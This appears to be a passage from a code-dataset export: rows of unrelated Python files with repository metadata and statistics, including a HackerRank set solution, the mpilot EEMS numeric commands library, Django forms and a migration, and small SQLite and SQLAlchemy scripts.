| 34.666667 | 125 | 0.579212 | 233 | 2,184 | 5.270386 | 0.515021 | 0.028502 | 0.039088 | 0.070847 | 0.179967 | 0.065147 | 0.065147 | 0 | 0 | 0 | 0 | 0.069281 | 0.299451 | 2,184 | 62 | 126 | 35.225806 | 0.733333 | 0.111722 | 0 | 0.041667 | 0 | 0 | 0.304979 | 0.087656 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0.0625 | false | 0.083333 | 0.083333 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7ad8b48b9381ffbf31887fa648e99f17d08a746a | 282 | py | Python | Python/Sets/symmertic_diffrence.py | abivilion/Hackerank-Solutions- | e195fb1fce1588171cf12d99d38da32ca5c8276a | [
"MIT"
] | null | null | null | Python/Sets/symmertic_diffrence.py | abivilion/Hackerank-Solutions- | e195fb1fce1588171cf12d99d38da32ca5c8276a | [
"MIT"
] | null | null | null | Python/Sets/symmertic_diffrence.py | abivilion/Hackerank-Solutions- | e195fb1fce1588171cf12d99d38da32ca5c8276a | [
"MIT"
] | null | null | null | # a,b = [set(input().split()) for i in range(4)][1::2]
# print ('\n'.join(sorted(a^b, key=int)))
a,b=(int(input()),input().split())
c,d=(int(input()),input().split())
x=set(b)
y=set(d)
p=y.difference(x)
q=x.difference(y)
r=p.union(q)
print ('\n'.join(sorted(r, key=int)))
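The union of the two one-way differences computed above is exactly the symmetric difference, which Python sets also expose as the `^` operator:

```python
x = {'1', '2', '3', '4'}
y = {'3', '4', '5', '6'}
sym = x.difference(y) | y.difference(x)
assert sym == x ^ y  # same result via the symmetric-difference operator
sorted(sym, key=int)  # -> ['1', '2', '5', '6']
```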
| 25.636364 | 55 | 0.567376 | 57 | 282 | 2.807018 | 0.473684 | 0.0375 | 0.125 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012 | 0.113475 | 282 | 10 | 56 | 28.2 | 0.628 | 0.326241 | 0 | 0 | 0 | 0 | 0.011299 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7adb54044291cf0ab7965afb9c970e868933f5bd | 15,841 | py | Python | mpilot/libraries/eems/basic.py | consbio/MPilot | e0c48b6640982c8234404b2f2ca34859b0c96dc0 | [
"MIT"
] | null | null | null | mpilot/libraries/eems/basic.py | consbio/MPilot | e0c48b6640982c8234404b2f2ca34859b0c96dc0 | [
"MIT"
] | null | null | null | mpilot/libraries/eems/basic.py | consbio/MPilot | e0c48b6640982c8234404b2f2ca34859b0c96dc0 | [
"MIT"
] | null | null | null | from __future__ import division
import copy
from functools import reduce
import numpy
import six
from mpilot import params
from mpilot.commands import Command
from mpilot.libraries.eems.exceptions import (
MismatchedWeights,
MixedArrayLengths,
DuplicateRawValues,
)
from mpilot.libraries.eems.mixins import SameArrayShapeMixin
from mpilot.utils import insure_fuzzy
class Copy(Command):
"""Copies the data from another field"""
display_name = "Copy"
inputs = {"InFieldName": params.ResultParameter(params.DataParameter())}
output = params.DataParameter()
def execute(self, **kwargs):
return numpy.copy(kwargs["InFieldName"].result)
class AMinusB(SameArrayShapeMixin, Command):
"""Performs A - B"""
display_name = "A Minus B"
inputs = {
"A": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"B": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
}
output = params.DataParameter()
def execute(self, **kwargs):
a = kwargs["A"].result
b = kwargs["B"].result
self.validate_array_shapes([a, b], lineno=self.lineno)
return a - b
class Sum(SameArrayShapeMixin, Command):
"""Sums input variables"""
display_name = "Sum"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
)
}
output = params.DataParameter()
def execute(self, **kwargs):
arrays = [c.result for c in kwargs["InFieldNames"]]
self.validate_array_shapes(arrays, lineno=self.lineno)
result = arrays[0].copy()
for arr in arrays[1:]:
result += arr
return result
class WeightedSum(SameArrayShapeMixin, Command):
"""Takes the weighted sum of input variables"""
display_name = "Weighted Sum"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
),
"Weights": params.ListParameter(params.NumberParameter()),
}
output = params.DataParameter()
def execute(self, **kwargs):
weights = kwargs["Weights"]
arrays = [c.result for c in kwargs["InFieldNames"]]
if len(weights) != len(arrays):
raise MismatchedWeights(len(weights), len(arrays))
self.validate_array_shapes(arrays, lineno=self.lineno)
result = arrays[0] * weights[0]
for weight, arr in zip(weights[1:], arrays[1:]):
result += arr * weight
return result
class Multiply(SameArrayShapeMixin, Command):
"""Multiplies input variables"""
display_name = "Multiply"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
)
}
output = params.DataParameter()
def execute(self, **kwargs):
arrays = [c.result for c in kwargs["InFieldNames"]]
self.validate_array_shapes(arrays, lineno=self.lineno)
result = numpy.copy(arrays[0])
for arr in arrays[1:]:
result *= arr
return result
class ADividedByB(SameArrayShapeMixin, Command):
"""Performs A / B"""
display_name = "A Divided By B"
inputs = {
"A": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"B": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
}
output = params.DataParameter()
def execute(self, **kwargs):
a = kwargs["A"].result
b = kwargs["B"].result
self.validate_array_shapes([a, b], lineno=self.lineno)
return a / b
class Minimum(SameArrayShapeMixin, Command):
"""Takes the minimum input variables"""
display_name = "Minimum"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
)
}
output = params.DataParameter()
def execute(self, **kwargs):
arrays = [c.result for c in kwargs["InFieldNames"]]
self.validate_array_shapes(arrays, lineno=self.lineno)
return reduce(lambda x, y: numpy.ma.minimum(x, y), arrays)
class Maximum(SameArrayShapeMixin, Command):
"""Takes the maximum input variables"""
display_name = "Maximum"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
)
}
output = params.DataParameter()
def execute(self, **kwargs):
arrays = [c.result for c in kwargs["InFieldNames"]]
self.validate_array_shapes(arrays, lineno=self.lineno)
return reduce(lambda x, y: numpy.ma.maximum(x, y), arrays)
class Mean(SameArrayShapeMixin, Command):
"""Mean of input variables"""
display_name = "Mean"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
)
}
output = params.DataParameter()
def execute(self, **kwargs):
arrays = [c.result for c in kwargs["InFieldNames"]]
self.validate_array_shapes(arrays, lineno=self.lineno)
return sum(arrays) / len(arrays)
class WeightedMean(SameArrayShapeMixin, Command):
"""Takes the weighted mean of input variables"""
display_name = "Weighted Mean"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
),
"Weights": params.ListParameter(params.NumberParameter()),
}
output = params.DataParameter()
def execute(self, **kwargs):
weights = kwargs["Weights"]
arrays = [c.result for c in kwargs["InFieldNames"]]
if len(weights) != len(arrays):
raise MismatchedWeights(len(weights), len(arrays))
self.validate_array_shapes(arrays, lineno=self.lineno)
result = arrays[0] * weights[0]
for weight, arr in zip(weights[1:], arrays[1:]):
result += arr * weight
return result / sum(weights)
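`WeightedMean` forms the element-wise weighted sum and divides by the weight total; the arithmetic on plain lists (names hypothetical):

```python
def weighted_mean(arrays, weights):
    # Element-wise sum of weight * array, divided by the total weight.
    totals = [sum(w * a[i] for w, a in zip(weights, arrays))
              for i in range(len(arrays[0]))]
    return [t / float(sum(weights)) for t in totals]

weighted_mean([[1, 2], [3, 4]], [1, 3])  # -> [2.5, 3.5]
```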
class Normalize(Command):
"""Normalizes the data from another field to range (default 0:1)"""
display_name = "Normalize"
inputs = {
"InFieldName": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"StartVal": params.NumberParameter(required=False),
"EndVal": params.NumberParameter(required=False),
}
output = params.DataParameter()
def execute(self, **kwargs):
arr = kwargs["InFieldName"].result
start = kwargs.get("StartVal", 0)
end = kwargs.get("EndVal", 1)
arr_min = arr.min()
arr_max = arr.max()
return (arr - arr_min) * (start - end) / (arr_min - arr_max) + start
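The return expression is a standard linear rescale: map [min, max] onto [start, end]. The same formula on a plain list (function name hypothetical):

```python
def rescale(values, start=0.0, end=1.0):
    # (v - lo) * (start - end) / (lo - hi) + start maps lo -> start
    # and hi -> end, identically to Normalize.execute above.
    lo, hi = min(values), max(values)
    return [(v - lo) * (start - end) / (lo - hi) + start for v in values]

rescale([2.0, 4.0, 6.0])  # -> [0.0, 0.5, 1.0]
```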
class NormalizeZScore(Command):
"""Converts input values into normalized values using linear interpolation based on Z Score"""
display_name = "Normalize by Z Score"
inputs = {
"InFieldName": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"TrueThresholdZScore": params.NumberParameter(required=False),
"FalseThresholdZScore": params.NumberParameter(required=False),
"StartVal": params.NumberParameter(required=False),
"EndVal": params.NumberParameter(required=False),
}
output = params.DataParameter()
def execute(self, **kwargs):
arr = kwargs["InFieldName"].result
true_threshold = float(kwargs.get("TrueThresholdZScore", 0))
false_threshold = float(kwargs.get("FalseThresholdZScore", 1))
start = kwargs.get("StartVal", 0)
end = kwargs.get("EndVal", 1)
raw_mean = numpy.ma.mean(arr)
raw_std = numpy.ma.std(arr)
x1 = raw_mean + raw_std * true_threshold
x2 = raw_mean + raw_std * false_threshold
y1 = end
y2 = start
result = arr.copy()
result -= x1
result *= y2 - y1
result /= x2 - x1
result += y1
# despite the name, `insure_fuzzy` works to constrain values to any range
return insure_fuzzy(result, start, end)
class NormalizeCat(Command):
"""Converts integer input values into narmalized values based on user specification"""
display_name = "Normalize by Category"
inputs = {
"InFieldName": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"RawValues": params.ListParameter(params.NumberParameter()),
"NormalValues": params.ListParameter(params.NumberParameter()),
"DefaultNormalValue": params.NumberParameter(),
}
output = params.DataParameter()
def execute(self, **kwargs):
arr = kwargs["InFieldName"].result
raw_values = kwargs["RawValues"]
normal_values = kwargs["NormalValues"]
default_normal_value = kwargs["DefaultNormalValue"]
if len(raw_values) != len(normal_values):
raise MixedArrayLengths(
len(raw_values), len(normal_values), lineno=self.lineno
)
if len(raw_values) != len(set(raw_values)):
raise DuplicateRawValues(lineno=self.argument_lines.get("RawValues"))
result = numpy.ma.array(
numpy.full(arr.shape, default_normal_value, dtype=float)
)
for raw, normal in zip(raw_values, normal_values):
result[arr.data == raw] = normal
return result
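`NormalizeCat` is essentially a lookup table with a default for unlisted categories; the same idea with a dict (names hypothetical):

```python
def normalize_cat(values, raw_values, normal_values, default):
    # Map each raw category to its normal value, falling back to the
    # default for categories not listed.
    mapping = dict(zip(raw_values, normal_values))
    return [mapping.get(v, default) for v in values]

normalize_cat([1, 2, 9], [1, 2], [0.2, 0.8], 0.0)  # -> [0.2, 0.8, 0.0]
```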
class NormalizeCurve(Command):
"""Converts input values into normalized values based on user-defined curve"""
display_name = "Normalize Curve"
inputs = {
"InFieldName": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"RawValues": params.ListParameter(params.NumberParameter()),
"NormalValues": params.ListParameter(params.NumberParameter()),
}
output = params.DataParameter()
def execute(self, **kwargs):
arr = kwargs["InFieldName"].result
raw_values = kwargs["RawValues"]
normal_values = kwargs["NormalValues"]
if len(raw_values) != len(normal_values):
raise MixedArrayLengths(
len(raw_values), len(normal_values), lineno=self.lineno
)
if len(raw_values) != len(set(raw_values)):
raise DuplicateRawValues(lineno=self.argument_lines.get("RawValues"))
result = numpy.ma.empty(arr.shape, dtype=float)
value_pairs = sorted(zip(raw_values, normal_values))
# For raw values less than or equal to the lowest raw value, set them to the corresponding normal value
result[arr <= value_pairs[0][0]] = value_pairs[0][1]
# Assign normal values for each of the line segments that approximate the curve
for i, (raw, normal) in list(enumerate(value_pairs))[1:]:
prev_raw = value_pairs[i - 1][0]
prev_normal = value_pairs[i - 1][1]
m = (normal - prev_normal) / (raw - prev_raw)
b = prev_normal - m * prev_raw
where_idx = numpy.where(
numpy.logical_and(arr.data > prev_raw, arr.data <= raw)
)
result[where_idx] = arr.data[where_idx]
result[where_idx] *= m
result[where_idx] += b
# For raw values greater than the highest raw value, set them to the corresponding normal value
result[arr > value_pairs[-1][0]] = value_pairs[-1][1]
result.mask = arr.mask.copy()
return result
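`NormalizeCurve` clamps below the first and above the last control point and interpolates linearly between adjacent ones; a scalar sketch of that mapping (function name hypothetical):

```python
def curve(x, raw_values, normal_values):
    # Clamp outside the control points, linear interpolation between
    # them — mirrors the segment loop in NormalizeCurve.execute above.
    pairs = sorted(zip(raw_values, normal_values))
    if x <= pairs[0][0]:
        return pairs[0][1]
    if x > pairs[-1][0]:
        return pairs[-1][1]
    for (x0, y0), (x1, y1) in zip(pairs, pairs[1:]):
        if x0 < x <= x1:
            m = (y1 - y0) / float(x1 - x0)
            return y0 + m * (x - x0)

curve(5, [0, 10], [0.0, 1.0])   # -> 0.5
curve(-3, [0, 10], [0.0, 1.0])  # -> 0.0
```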
class NormalizeMeanToMid(NormalizeCurve):
"""Uses "NormalizeCurve" to create a non-linear transformation that is a good match for the input data"""
display_name = "Mean to Mid"
inputs = {
"InFieldName": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"IgnoreZeros": params.BooleanParameter(),
"NormalValues": params.ListParameter(params.NumberParameter()),
}
output = params.DataParameter()
def execute(self, **kwargs):
arr = kwargs["InFieldName"].result
ignore_zeros = kwargs["IgnoreZeros"]
low_value = arr.min()
high_value = arr.max()
if ignore_zeros:
arr = arr[arr != 0]
mean_value = arr.mean()
below_mean = arr[arr <= mean_value]
above_mean = arr[arr > mean_value]
high_mean = above_mean.compressed().mean()
low_mean = below_mean.compressed().mean()
raw_values = [low_value, low_mean, mean_value, high_mean, high_value]
normal_values = kwargs["NormalValues"][:]
if raw_values[-1] == raw_values[-2]:
del raw_values[-2]
del normal_values[-2]
if raw_values[0] == raw_values[1]:
del raw_values[1]
del normal_values[1]
kwargs = copy.copy(kwargs)
kwargs["RawValues"] = raw_values
kwargs["NormalValues"] = normal_values
return super(NormalizeMeanToMid, self).execute(**kwargs)
class NormalizeCurveZScore(Command):
"""Converts input values into narmalized values based on user-defined curve"""
display_name = "Normalize Curve by Z Score"
inputs = {
"InFieldName": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"ZScoreValues": params.ListParameter(params.NumberParameter()),
"NormalValues": params.ListParameter(params.NumberParameter()),
}
output = params.DataParameter()
def execute(self, **kwargs):
arr = kwargs["InFieldName"].result
z_score_values = kwargs["ZScoreValues"]
normal_values = kwargs["NormalValues"]
if len(z_score_values) != len(normal_values):
raise MixedArrayLengths(
len(z_score_values), len(normal_values), lineno=self.lineno
)
raw_mean = numpy.ma.mean(arr)
raw_std = numpy.ma.std(arr)
raw_values = [raw_mean + value * raw_std for value in z_score_values]
result = numpy.ma.empty(arr.shape, dtype=float)
value_pairs = sorted(zip(raw_values, normal_values))
# For raw values less than the lowest raw value, set them to the corresponding normal value
result[arr <= value_pairs[0][0]] = value_pairs[0][1]
# Assign normal values for each of the line segments that approximate the curve
for i, (raw, normal) in list(enumerate(value_pairs))[1:]:
prev_raw = value_pairs[i - 1][0]
prev_normal = value_pairs[i - 1][1]
m = (normal - prev_normal) / (raw - prev_raw)
b = prev_normal - m * prev_raw
where_idx = numpy.where(
numpy.logical_and(arr.data > prev_raw, arr.data <= raw)
)
result[where_idx] = arr.data[where_idx]
result[where_idx] *= m
result[where_idx] += b
# For raw values greater than the highest raw value, set them to the corresponding normal value
result[arr > value_pairs[-1][0]] = value_pairs[-1][1]
result.mask = arr.mask.copy()
return result
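For unmasked data the clamped piecewise-linear loop above is equivalent to `numpy.interp`, which also holds the end values outside the breakpoint range; a standalone sketch with made-up numbers:

```python
import numpy as np

arr = np.array([-3.0, -1.0, 0.0, 1.0, 3.0])
z_score_values = [-2.0, 0.0, 2.0]
normal_values = [0.0, 0.5, 1.0]

# breakpoints in raw units: mean + z * std (mean is 0.0, std is 2.0 here)
raw_mean, raw_std = arr.mean(), arr.std()
raw_values = [raw_mean + z * raw_std for z in z_score_values]

# interp clamps to normal_values[0] / normal_values[-1] at the extremes,
# matching the <= lowest and > highest branches of the loop
result = np.interp(arr, raw_values, normal_values)
print(result)
```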
class PrintVars(Command):
"""Prints each variable in a list of variable names."""
display_name = "Print variable(s) to screen or file"
inputs = {
"InFieldNames": params.ListParameter(params.ResultParameter()),
"OutFileName": params.PathParameter(must_exist=False, required=False),
}
output = params.BooleanParameter()
def execute(self, **kwargs):
commands = kwargs["InFieldNames"]
out_path = kwargs.get("OutFileName")
if out_path:
with open(out_path, "w") as f_out:
f_out.write(
"\n".join(
"{}: {}".format(c.result_name, c.result) for c in commands
)
)
else:
for command in kwargs["InFieldNames"]:
print("{}: {}".format(command.result_name, command.result))
return True
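PrintVars only formats `result_name: result` pairs; with stand-in tuples in place of the command objects, the file-writing branch reduces to:

```python
# (name, result) tuples stand in for the command objects and their
# .result_name / .result attributes
commands = [("accuracy", 0.93), ("n_volumes", 200)]
text = "\n".join("{}: {}".format(name, result) for name, result in commands)
print(text)
```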
| 31.9375 | 109 | 0.629506 | 1,753 | 15,841 | 5.575585 | 0.127781 | 0.066094 | 0.049724 | 0.073665 | 0.706568 | 0.680786 | 0.655003 | 0.631574 | 0.614897 | 0.601289 | 0 | 0.005502 | 0.254277 | 15,841 | 495 | 110 | 32.00202 | 0.821891 | 0.089262 | 0 | 0.548387 | 0 | 0 | 0.072271 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049853 | false | 0 | 0.029326 | 0.002933 | 0.328446 | 0.002933 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7adcd3919f89846eb5519f1327db7bcb0128e793 | 953 | py | Python | backend/api/migrations/0022_auto_20200610_0618.py | luizfilipezs/lousher | 267afbca6874d946801bd55db2c8f64da7dd594e | [
"Apache-2.0"
] | null | null | null | backend/api/migrations/0022_auto_20200610_0618.py | luizfilipezs/lousher | 267afbca6874d946801bd55db2c8f64da7dd594e | [
"Apache-2.0"
] | 14 | 2020-05-13T22:15:29.000Z | 2022-03-12T00:29:32.000Z | backend/api/migrations/0022_auto_20200610_0618.py | luizfilipezs/lousher | 267afbca6874d946801bd55db2c8f64da7dd594e | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.0.5 on 2020-06-10 06:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0021_auto_20200606_0449'),
]
operations = [
migrations.AlterField(
model_name='endereco',
name='bairro',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='endereco',
name='complemento',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='pedido',
name='status',
field=models.CharField(choices=[('em_analise', 'em análise'), ('preparando', 'preparando envio'), ('despachado', 'despachado'), ('entregue', 'entregue'), ('suspenso', 'suspenso'), ('cancelado', 'cancelado')], default='em_analise', max_length=20),
),
]
| 32.862069 | 258 | 0.593914 | 95 | 953 | 5.842105 | 0.557895 | 0.108108 | 0.135135 | 0.156757 | 0.376577 | 0.376577 | 0.281081 | 0.281081 | 0.281081 | 0.281081 | 0 | 0.055007 | 0.256034 | 953 | 28 | 259 | 34.035714 | 0.727786 | 0.047219 | 0 | 0.454545 | 1 | 0 | 0.217439 | 0.025386 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ae81ffd916d508ea02a5f801963bc2929653520 | 340 | py | Python | src/utils.py | Benjvdg/altered-configurator | fa0ef454156eefdd6396f1c4809d5cf93ed76154 | [
"MIT"
] | null | null | null | src/utils.py | Benjvdg/altered-configurator | fa0ef454156eefdd6396f1c4809d5cf93ed76154 | [
"MIT"
] | null | null | null | src/utils.py | Benjvdg/altered-configurator | fa0ef454156eefdd6396f1c4809d5cf93ed76154 | [
"MIT"
] | null | null | null | from .configuration import Configuration
def create_config_list(lst_config):
lst_obj_config = []
for config in lst_config:
split_path = config.split("\\")
name = split_path[-1].replace(".txt", "")
new_config = Configuration(name, config)
lst_obj_config.append(new_config)
return lst_obj_config
| 28.333333 | 49 | 0.679412 | 43 | 340 | 5.046512 | 0.465116 | 0.082949 | 0.165899 | 0.165899 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003745 | 0.214706 | 340 | 11 | 50 | 30.909091 | 0.808989 | 0 | 0 | 0 | 0 | 0 | 0.017647 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7aef14f9e97678b485424aba46ede0a6a6976f70 | 1,442 | py | Python | chat/forms.py | Firexd2/social-network | 8f7799aa54871843f55aed578e2c89a964c97ecc | [
"MIT"
] | 2 | 2018-12-28T19:21:55.000Z | 2019-05-15T14:37:12.000Z | chat/forms.py | Firexd2/social-network | 8f7799aa54871843f55aed578e2c89a964c97ecc | [
"MIT"
] | null | null | null | chat/forms.py | Firexd2/social-network | 8f7799aa54871843f55aed578e2c89a964c97ecc | [
"MIT"
] | 2 | 2019-10-16T08:01:04.000Z | 2021-07-13T06:02:15.000Z | from django import forms
from chat.models import Message, Room
class NewRoomForm(forms.ModelForm):
ids_users = forms.CharField(label='', required=False, widget=forms.TextInput(attrs={'hidden': 'true'}))
first_message = forms.CharField(label='Приветственное сообщение', required=False,
widget=forms.Textarea(attrs={'class': 'form-control', 'cols': '52', 'rows': '1'}))
type = forms.CharField(label='', widget=forms.TextInput(attrs={'style': 'display:none', 'value': 'conversation'}))
class Meta:
model = Room
fields = ['name', 'ids_users', 'first_message', 'type']
widgets = {'name': forms.TextInput(attrs={'class': 'form-control'})}
class EditRoomLogoForm(forms.ModelForm):
class Meta:
model = Room
fields = ['logo']
widgets = {'logo': forms.FileInput(attrs={'class': 'form-control'})}
class EditRoomNameForm(forms.ModelForm):
class Meta:
model = Room
fields = ['name']
widgets = {'name': forms.TextInput(attrs={'class': 'form-control'})}
class OutRoomForm(forms.ModelForm):
id = forms.IntegerField(label='', widget=forms.TextInput())
class Meta:
model = Room
fields = ['id']
class SendMessageForm(forms.ModelForm):
id = forms.CharField()
destination = forms.CharField()
class Meta:
model = Message
fields = ['text', 'id', 'destination']
| 27.207547 | 118 | 0.620666 | 150 | 1,442 | 5.94 | 0.353333 | 0.078563 | 0.078563 | 0.094276 | 0.291807 | 0.23569 | 0.199776 | 0.114478 | 0.114478 | 0 | 0 | 0.002667 | 0.219834 | 1,442 | 52 | 119 | 27.730769 | 0.789333 | 0 | 0 | 0.34375 | 0 | 0 | 0.149792 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7af0056e7bb93cced5cf1fc4661b1b37c8a184f1 | 2,491 | py | Python | Books/GodOfPython/P17_Database/chapter17.py | Tim232/Python-Things | 05f0f373a4cf298e70d9668c88a6e3a9d1cd8146 | [
"MIT"
] | 2 | 2020-12-05T07:42:55.000Z | 2021-01-06T23:23:18.000Z | Books/GodOfPython/P17_Database/chapter17.py | Tim232/Python-Things | 05f0f373a4cf298e70d9668c88a6e3a9d1cd8146 | [
"MIT"
] | null | null | null | Books/GodOfPython/P17_Database/chapter17.py | Tim232/Python-Things | 05f0f373a4cf298e70d9668c88a6e3a9d1cd8146 | [
"MIT"
] | null | null | null | from sqlite3 import *
# mydb = connect('D:/02.Python/ch17/fruit.db')
# csr = mydb.cursor()
# csr.execute('create table test(fruit varchar(20), num int, price int)')
# csr.execute("insert into test(fruit, num, price) values('Apple', 10, 1000)")
# csr.execute('select * from test')
# row = csr.fetchone()
# print(row)
# mydb.commit()
# mydb.close()
# conn = connect('C:/sqlite/mydb.db')
# csr = conn.cursor()
# csr.execute('select * from mytable')
# print(csr.fetchone())
# conn = connect('D:/02.Python/ch17/mydb.db')
# c = conn.cursor()
# c.execute('''create table mytable(word text, meaning text, level integer)''')
# c.close()
# conn = connect('D:/02.Python/ch17/mydb.db')
# c = conn.cursor()
# c.execute('''insert into mytable(word, meaning, level)
# values("python", "A python is a large snake that kills animals by squeezing them with its body.", 2)''')
# c.execute('''insert into mytable(word, meaning, level)
# values("sql", "structured query language: a computer programing language used for database management.", 1)''')
# c.execute('''insert into mytable(word, meaning, level)
# values("apple", "An apple is a round fruit with smooth green, yellow, or red skin and firm write flesh.", 1)''')
# c.execute('''select * from mytable''')
# print(c.fetchall())
# c.close()
# conn.commit()
# conn.close()
# conn = connect('D:/02.Python/ch17/mydb.db')
# c = conn.cursor()
# word = input('word : ')
# meaning = input('meaning : ')
# level = input('level : ')
# c.execute('insert into mytable values(?,?,?)', (word, meaning, level))
# c.execute('select * from mytable')
# print(c.fetchall())
# c.close()
# conn.commit()
# conn.close()
# conn = connect('D:/02.Python/ch17/mydb.db')
# c = conn.cursor()
# record1 = ('test_word1', 'test_word1_meaning', 1)
# record2 = ('test_word2', 'test_word2_meaning', 2)
# record3 = ('test_word3', 'test_word3_meaning', 3)
# record4 = ('test_word4', 'test_word4_meaning', 4)
# all_record = (record1, record2, record3, record4)
# c.executemany('''insert into mytable values(?,?,?)''', all_record)
# c.execute('''select * from mytable''')
# print(c.fetchall())
# c.close()
# conn.commit()
# conn.close()
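Every commented-out snippet above repeats the same connect, execute, commit, close cycle; an in-memory database makes the pattern runnable without the D:/ paths (table contents are made up):

```python
import sqlite3

conn = sqlite3.connect(':memory:')  # throwaway database, nothing written to disk
c = conn.cursor()
c.execute('create table mytable(word text, meaning text, level integer)')
c.executemany('insert into mytable values(?,?,?)',
              [('python', 'a large snake', 2), ('sql', 'a query language', 1)])
conn.commit()
c.execute('select word from mytable where level=?', (1,))
rows = c.fetchall()
c.close()
conn.close()
print(rows)
```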
conn = connect('yourdb.db')
c = conn.cursor()
c.executescript('''create table yourtable(word, meaning, level, time);
insert into yourtable values('test_workd0', 'test_meaning0', 1, datetime('now'));
insert into yourtable values('test_workd1', 'test_meaning1', 2, datetime('now'));''')
c.close()
conn.commit()
conn.close() | 31.935897 | 118 | 0.660779 | 348 | 2,491 | 4.678161 | 0.301724 | 0.049754 | 0.030713 | 0.04914 | 0.425061 | 0.335381 | 0.320025 | 0.320025 | 0.320025 | 0.238329 | 0 | 0.026939 | 0.135688 | 2,491 | 78 | 119 | 31.935897 | 0.729215 | 0.809314 | 0 | 0 | 0 | 0 | 0.551069 | 0.099762 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7afc81f420c7a7b1650e0243a1f216e195ab99db | 642 | py | Python | api/app/database.py | Le96/todays-mazai | 1af8f57d7827d883a6c91661dc375b79274c94f5 | [
"MIT"
] | null | null | null | api/app/database.py | Le96/todays-mazai | 1af8f57d7827d883a6c91661dc375b79274c94f5 | [
"MIT"
] | 10 | 2022-02-27T11:01:23.000Z | 2022-03-29T12:53:33.000Z | api/app/database.py | Le96/todays-mazai | 1af8f57d7827d883a6c91661dc375b79274c94f5 | [
"MIT"
] | null | null | null | import os
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
USER = os.getenv("DB_USER")
PASS = os.getenv("DB_PASSWORD")
HOST = os.getenv("DB_HOST")
PORT = os.getenv("DB_PORT")
SCHEMA = os.getenv("DB_SCHEMA")
SQLALCHEMY_DATABASE_URL = f"postgresql+psycopg2://{USER}:{PASS}@{HOST}:{PORT}/{SCHEMA}"
engine = create_engine(SQLALCHEMY_DATABASE_URL)
